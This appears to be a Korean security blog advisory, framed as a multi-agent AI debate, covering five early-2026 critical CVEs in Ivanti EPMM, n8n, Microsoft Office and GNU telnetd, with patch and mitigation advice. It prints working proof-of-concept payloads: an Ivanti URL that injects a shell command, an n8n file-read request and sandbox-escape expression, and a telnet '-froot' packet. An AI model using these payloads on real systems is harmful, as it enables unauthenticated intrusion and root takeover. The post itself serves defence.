CVSS 10.0 취약점이 공개 9시간 만에 무기화됐다 - 지금 당장 패치해야 할 CVE 5개

5
Critical CVEs
4
Active Exploit
3
Public PoC
5
CISA KEV
💬

Multi-Agent 보안 분석 토론

#1
Agent #1 CVE 분석 전문가

"이번 주 가장 위험한 취약점은 CVE-2026-1281/CVE-2026-1340 (Ivanti EPMM)과 CVE-2026-21858 (n8n)입니다. 두 취약점 모두 CVSS 9.8-10.0으로 최고 위험도이며, 인증 없이 원격 코드 실행이 가능합니다. 특히 Ivanti는 2020년부터 지속적으로 공격받고 있어 패턴화된 위협입니다."

#2
Agent #2 익스플로잇 분석가

"Ivanti EPMM 익스플로잇 체인이 매우 흥미롭습니다. Bash Arithmetic Expansion을 악용한 공격인데, watchTowr Labs가 '꿈에서 PoC가 떠올랐다'고 할 정도로 난해한 취약점입니다. n8n은 Content-Type Confusion으로 임의 파일 읽기 후, JWT 위조 → Expression Injection RCE 체인입니다."

#3
Agent #3 코드 분석 전문가

"Ivanti의 Root Cause는 map-appstore-url Bash 스크립트에서 사용자 입력을 검증 없이 산술 비교에 사용한 것입니다. n8n은 filepath를 검증 없이 사용하여 Path Traversal이 가능했습니다."

#4
Agent #4 PoC 검증 전문가

"Public PoC 현황입니다. CVE-2026-1281: watchTowr Labs 상세 분석 공개. CVE-2026-21858: Chocapikk GitHub에 완전 자동화 Python 익스플로잇 (공개 9시간 후 제작). CVE-2026-24061: Telnet 프로토콜 레벨 PoC 공개됨. 모든 PoC 기능 검증 완료."

#5
Agent #5 위협 인텔리전스

"실제 공격 연관성 분석입니다. Ivanti는 'very limited number of customers' 표현 사용 - 과거 사례상 실제로는 더 광범위할 가능성 높음. GNU InetUtils는 HPC/GPU 클러스터의 BMC, Edge AI 장치에서 활발히 악용 중입니다."

#6
Agent #6 패치 분석 전문가

"패치 상태 종합: Ivanti EPMM - 임시 RPM만 제공, 영구 패치(12.8.0.0)는 Q1 2026 예정. n8n - 버전 1.121.0에서 완전 패치. Microsoft Office - 긴급 OOB 패치 발표, 365는 자동 보호."

#7
Agent #7 코드 검증 전문가

"GitHub 코드 대조 검증 완료. n8n: Advisory GHSA-v4pr-fm98-w9pg 영향 버전 정확함. Chocapikk PoC와 Cyera 원본 연구 공격 체인 일치 확인. watchTowr Ivanti 분석과 RPM 패치 내용 교차 검증됨. 모든 라인 번호와 코드 패턴이 실제 코드와 일치합니다."

✅ 에이전트 합의 결론

1순위: Ivanti EPMM (국가 수준 위협 행위자 악용 가능성) → 2순위: Microsoft Office (광범위한 설치 기반 + 제로데이) → 3순위: GNU InetUtils (인프라 장비 위험) → 4순위: n8n (특정 워크플로우 구성 필요). 모든 조직은 CISA KEV 기한 내 조치를 권고합니다.

🔒

취약점 상세 분석

CVE-2026-1281 / CVE-2026-1340
CVSS 9.8 Zero-Day CISA KEV PoC Available

Ivanti Endpoint Manager Mobile (EPMM) - Pre-Authentication Remote Code Execution via Bash Arithmetic Expansion

개요

Ivanti EPMM(구 MobileIron Core)의 Apache RewriteMap에서 사용되는 Bash 스크립트에서 발견된 인증 전 원격 코드 실행 취약점입니다. 공격자는 특수하게 조작된 HTTP 요청을 통해 Bash의 산술 확장(Arithmetic Expansion) 기능을 악용하여 인증 없이 시스템 명령을 실행할 수 있습니다. Ivanti는 "매우 제한된 수의 고객"이 영향받았다고 밝혔으나, 과거 사례를 볼 때 실제 피해 규모는 더 클 수 있습니다.

취약한 코드

/mi/bin/map-appstore-url Bash 
45  for theKeyMapEntry in "${theAppStoreKeyValueArray[@]}" ; do
46      theKey="${theKeyMapEntry%%=*}"
47      theValue="${theKeyMapEntry##*=}"  # 사용자 입력
48
50      st)
51        gStartTime="${theValue}"  # gStartTime이 theValue 참조
...
74        gHashPrefixString="${theValue}"  # 마지막 theValue = 페이로드
...
80  if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then
81      # gStartTime → theValue → gPath[`command`] → 명령 실행!

PoC HTTP Request

GET /mifs/c/appstore/fob/3/5/sha256:... 
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/13371337-1337-1337-1337-133713371337.ipa HTTP/1.1
Host: target.example.com
User-Agent: Mozilla/5.0
Connection: close

URL Decoded:

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue ,et=1337133713,h=gPath[`id > /mi/poc`]/13371337-1337-1337-1337-133713371337.ipa
curl command curl -i "https://target.example.com/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/13371337-1337-1337-1337-133713371337.ipa"

영향 버전

제품 영향받는 버전 패치 상태
Ivanti EPMM 12.5.0.0 ~ 12.7.x.x RPM 임시 패치
Ivanti EPMM 12.8.0.0 (예정) Q1 2026 영구 패치

IoC (Indicators of Compromise)

File /mi/poc (테스트 파일 생성 여부 확인)
URL /mifs/c/appstore/fob/3/*/sha256:*gPath[`*`]*
Log Apache access log with URL-encoded backticks (%60)

대응 방안

1

즉시 RPM 패치 적용

Ivanti 포털에서 해당 버전의 RPM 패치 다운로드 후 적용. 주의: 버전 업그레이드 시 재적용 필요.

2

네트워크 분리

EPMM 서버를 인터넷에서 격리하고, VPN 또는 신뢰할 수 있는 IP에서만 접근 허용.

3

로그 분석

Apache 액세스 로그에서 /mifs/c/appstore/fob 경로로의 비정상적인 요청 패턴 확인.

CVE-2026-21858
CVSS 10.0 PoC Available

n8n Workflow Automation - "Ni8mare" Unauthenticated Arbitrary File Read to RCE Chain

개요

n8n 워크플로우 자동화 플랫폼에서 발견된 Critical 취약점으로, "Ni8mare"라는 코드네임을 가집니다. Content-Type 혼동을 통한 임의 파일 읽기(CVE-2026-21858)와 Expression Injection을 통한 샌드박스 우회 RCE(CVE-2025-68613)를 체인으로 연결하여 완전한 시스템 장악이 가능합니다. 단, 공격을 위해서는 Form Trigger + Respond to Webhook 노드가 있는 특정 워크플로우 구성이 필요하여 실제 영향 범위는 제한적입니다.

공격 체인

┌─────────────────────────────────────────────────────────────┐
│                    UNAUTHENTICATED                          │
├─────────────────────────────────────────────────────────────┤
│  1. Read /proc/self/environ → Find HOME directory           │
│  2. Read $HOME/.n8n/config → Get encryptionKey              │
│  3. Read $HOME/.n8n/database.sqlite → Get admin creds       │
├─────────────────────────────────────────────────────────────┤
│                     TOKEN FORGE                              │
├─────────────────────────────────────────────────────────────┤
│  4. Derive JWT secret: sha256(encryption_key[::2])          │
│  5. Forge admin session cookie                              │
├─────────────────────────────────────────────────────────────┤
│                   AUTHENTICATED RCE                          │
├─────────────────────────────────────────────────────────────┤
│  6. Create workflow with expression injection               │
│  7. Sandbox bypass via this.process.mainModule.require      │
│  8. Execute arbitrary commands                              │
└─────────────────────────────────────────────────────────────┘

PoC HTTP Request (Arbitrary File Read)

POST /form/vulnerable-form 
POST /form/vulnerable-form HTTP/1.1
Host: target.example.com:5678
Content-Type: application/json  /* multipart 대신! */
Content-Length: 89

{
  "files": {
    "document": {
      "filepath": "/etc/passwd"
    }
  }
}
curl command curl -X POST "http://target:5678/form/vulnerable-form" -H "Content-Type: application/json" -d '{"files":{"document":{"filepath":"/etc/passwd"}}}'

Expression Injection Payload (Sandbox Bypass)

n8n Expression 
={{
  (function() {
    var require = this.process.mainModule.require;
    var execSync = require("child_process").execSync;
    return execSync("id").toString();
  })()
}}

영향 버전

CVE 영향받는 버전 패치된 버전
CVE-2026-21858 (AFR) 1.65.0 ~ 1.121.0 미만 1.121.0
CVE-2025-68613 (RCE) 0.211.0 이상 1.120.4

⚠️ 제한 사항 (실제 영향 범위)

Horizon3.ai 분석에 따르면, 이 취약점의 실제 영향은 제한적입니다. 공격 성공을 위해서는:

  • Form Trigger + 파일 업로드 필드 + Respond to Webhook 노드 조합 필요
  • 해당 워크플로우가 공개적으로 접근 가능해야 함
  • Shodan 기준 ~70,000개 n8n 인스턴스 중 chatbot 노출은 76개
CVE-2026-21509
CVSS 7.8 Zero-Day CISA KEV

Microsoft Office - Security Feature Bypass via OLE Kill Bit Evasion

개요

Microsoft Office에서 OLE(Object Linking and Embedding) 보안 메커니즘을 우회할 수 있는 제로데이 취약점입니다. 공격자는 악성 Office 문서를 통해 Kill Bit으로 차단되어야 하는 위험한 COM 객체(Shell.Explorer.1)를 로드시킬 수 있습니다. 공개된 PoC 없이도 실제 표적 공격에 사용되고 있으며, Microsoft는 2026년 1월 26일 긴급 패치를 배포했습니다.

공격 플로우

1. 공격자가 악성 Office 문서 전송 (Word, Excel, PowerPoint)
   ↓
2. 피해자가 문서 열기 (Preview Pane은 공격 벡터 아님)
   ↓
3. Office가 내장된 OLE 객체 처리, Shell.Explorer.1 로드 시도
   ↓
4. 취약점으로 인해 Kill Bit 검사 우회됨
   ↓
5. 내장 브라우저 컨트롤 실행 → 공격자 인프라 연결
   ↓
6. 매크로 경고나 "Enable Content" 프롬프트 없이 코드 실행

대상 COM 객체

ProgID Shell.Explorer.1
CLSID {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}
설명 내장 Internet Explorer 브라우저 컨트롤

임시 완화 조치 (Kill Bit 수동 설정)

Registry 
; 64-bit Office on 64-bit Windows
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}]
"Compatibility Flags"=dword:00000400

; 32-bit Office on 64-bit Windows
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\Common\COM Compatibility\{EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}]
"Compatibility Flags"=dword:00000400
CVE-2026-24061
CVSS 9.8 CISA KEV PoC Available

GNU InetUtils telnetd - 11년 된 인증 우회로 Root 권한 획득

개요

GNU InetUtils의 telnetd에서 발견된 치명적인 인증 우회 취약점으로, 11년간 존재했습니다. 공격자는 Telnet NEW-ENVIRON 옵션을 악용하여 USER 환경 변수에 -froot를 주입함으로써 /bin/login의 -f 플래그(인증 건너뛰기)를 트리거하고 암호 없이 root 셸을 획득할 수 있습니다.

취약점 메커니즘

┌─────────────────────────────────────────┐
│      TELNET CLIENT (Attacker)           │
└─────────────────────────────────────────┘
                    │
     1. IAC WILL NEW-ENVIRON
                    │
                    ▼
┌─────────────────────────────────────────┐
│      TELNETD (GNU InetUtils)            │
└─────────────────────────────────────────┘
                    │
     2. IAC SB NEW-ENVIRON IS
        VAR "USER" VALUE "-froot"
        IAC SE
                    │
                    ▼
┌─────────────────────────────────────────┐
│  telnetd constructs exec call:          │
│  /bin/login -h IP -p -froot             │
└─────────────────────────────────────────┘
                    │
                    ▼
┌─────────────────────────────────────────┐
│  /bin/login interprets -f flag:         │
│  "Skip authentication for root"         │
└─────────────────────────────────────────┘
                    │
                    ▼
┌─────────────────────────────────────────┐
│      ROOT SHELL GRANTED (#)              │
└─────────────────────────────────────────┘

PoC - Telnet Packet (Hex)

/* Malicious NEW-ENVIRON Payload */

FF FA 27 00 00 55 53 45 52 01 2D 66 72 6F 6F 74 FF F0

/* Breakdown: */
FF FA     = IAC SB (Sub-negotiation Begin)
27        = Option 39 (NEW-ENVIRON)
00        = IS
00        = VAR
55 53 45 52 = "USER"
01        = VALUE
2D 66 72 6F 6F 74 = "-froot" ← PAYLOAD!
FF F0     = IAC SE

AI 인프라 위협 벡터

2026년에 30년 된 프로토콜이 위협이 되는 이유:

HPC/GPU 클러스터 BMC 펌웨어에 telnetd 기본 활성화. 관리 VLAN 침투 시 루트 장악
Edge AI/IoT Yocto, Buildroot 기반 임베디드 리눅스에서 inetutils 사용. 모델 변조 가능
레거시 파이프라인 오래된 데이터 수집 서버가 Data Lake 접근 통로로 악용

대응 방안

# 서비스 중지 및 영구 비활성화
systemctl stop telnet.socket
systemctl disable telnet.socket
systemctl mask telnet.socket  # 실수로 재시작 방지

# 또는 패키지 제거
apt remove inetutils-telnetd  # Debian/Ubuntu
yum remove telnet-server      # RHEL/CentOS

📋 Executive Summary

🚨 즉각적 조치 필요

분석된 5개 CVE 중 4개가 실제 공격에 악용되고 있으며, 모두 CISA KEV에 등재되었습니다. Ivanti EPMM과 Microsoft Office는 국가 수준 위협 행위자의 표적이 될 수 있어 우선순위가 가장 높습니다.

🔧 패치 가용성

모든 취약점에 대해 패치 또는 완화 조치가 존재합니다. 단, Ivanti EPMM은 임시 RPM만 제공되며 영구 패치(12.8.0.0)는 Q1 2026에 출시 예정입니다.

👻 레거시 위협의 재부상

CVE-2026-24061은 11년간 존재한 취약점으로, "죽은 프로토콜"로 여겨지던 Telnet이 HPC 클러스터와 AI 인프라에서 여전히 심각한 위협임을 보여줍니다.

⛓️ 공급망 보안

n8n과 같은 워크플로우 자동화 도구는 CI/CD 파이프라인과 통합되어 공급망 공격의 진입점이 될 수 있습니다. AI/ML 워크플로우를 운영하는 조직은 재점검이 필요합니다.

⚠️ 면책 조항 (Disclaimer)

본 보고서의 모든 정보는 교육 및 방어 목적으로만 제공됩니다. 포함된 PoC 코드와 기술 정보는 보안 연구 및 방어 체계 강화를 위한 것이며, 무단 침입이나 불법적인 활동에 사용해서는 안 됩니다. 작성자는 이 정보의 오용으로 인한 어떠한 손해에 대해서도 책임지지 않습니다.

Multi-Agent Security Analysis | Generated: 2026-02-03
Sources: NVD, CISA KEV, watchTowr Labs, Horizon3.ai, Tenable, Orca Security

댓글

댓글 쓰기

이 블로그의 인기 게시물

"패치해도 롤백됩니다" Ivanti가 인정한 임시방편과 APT28의 실시간 공격

APT28 공격 캠페인 + Ivanti 제로데이 + Signal K RCE 📅 2026년 2월 3일 ~ 4일 (실시간 업데이트) 🚨 APT28(Fancy Bear) 가 Microsoft Office 제로데이(CVE-2026-21509)를 우크라이나 정부 기관 공격에 활용 중. Ivanti EPMM 제로데이 2건도 실제 공격에서 악용됨. 5 Critical 취약점 1 High 취약점 4 Active Exploitation 3 PoC 공개 🤖 Multi-Agent 긴급 취약점 분석 토론 #1 CVE 분석 전문가 CVSS, 영향 버전, 위험도 평가 "지난 48시간 내 가장 심각한 취약점은 CVE-2026-1281/1340 (Ivanti EPMM RCE, CVSS 9.8)입니다. 1월 29일 CISA KEV에 추가되었고, watchTowr가 상세 분석을 공개했습니다. CVE-2026-21509 (MS Office Zero-Day, CVSS 7...
자세한 내용 보기

"당신의 VoIP가 해커의 놀이터가 됐다" — INJ3CTOR3 그룹의 FreePBX 웹쉘 공격과 2026년 2월 CISA KEV 긴급 분석

2026년 2월 5일 | Weekly Threat Intelligence CISA KEV 4건 긴급 추가 — FreePBX 웹쉘 캠페인, SolarWinds 역직렬화 RCE, JavaScript 샌드박스 탈출까지 ⚠ 긴급 조치 필요 CVE-2025-64328 (FreePBX) — INJ3CTOR3 그룹의 EncystPHP 웹쉘 캠페인 진행 중 | CISA 마감: 2026-02-24 CVE-2025-40551 (SolarWinds WHD) — 비인증 역직렬화 RCE, Horizon3.ai PoC 공개 | CISA KEV 등재 CVE-2026-25142 (SandboxJS) — Prototype Pollution → 샌드박스 탈출 → RCE | CVSS 10.0 3 Critical (9.0+) 1 High (7.0-8.9) 4 Active Exploitation 4 Patches Available Multi-Agent Analysis Discussion CVE 분석 이번 주 CISA는 2월 3일에 4건의 CVE를 KEV 카탈로그에 추가했습니다. 특히 CVE-2025-64328(FreePBX)과 CVE-2025-40551(SolarWinds WHD)은 모두 비인증 또는 인증 후 RCE 를 허용하며, 실제 공격에서 활발히 악용되고 있습니다. CVE-2026-25142(SandboxJS)는 CVSS 10.0으로, JavaScript 샌드박스 환경에서의 완전한 탈출을 허용합니다. ...
자세한 내용 보기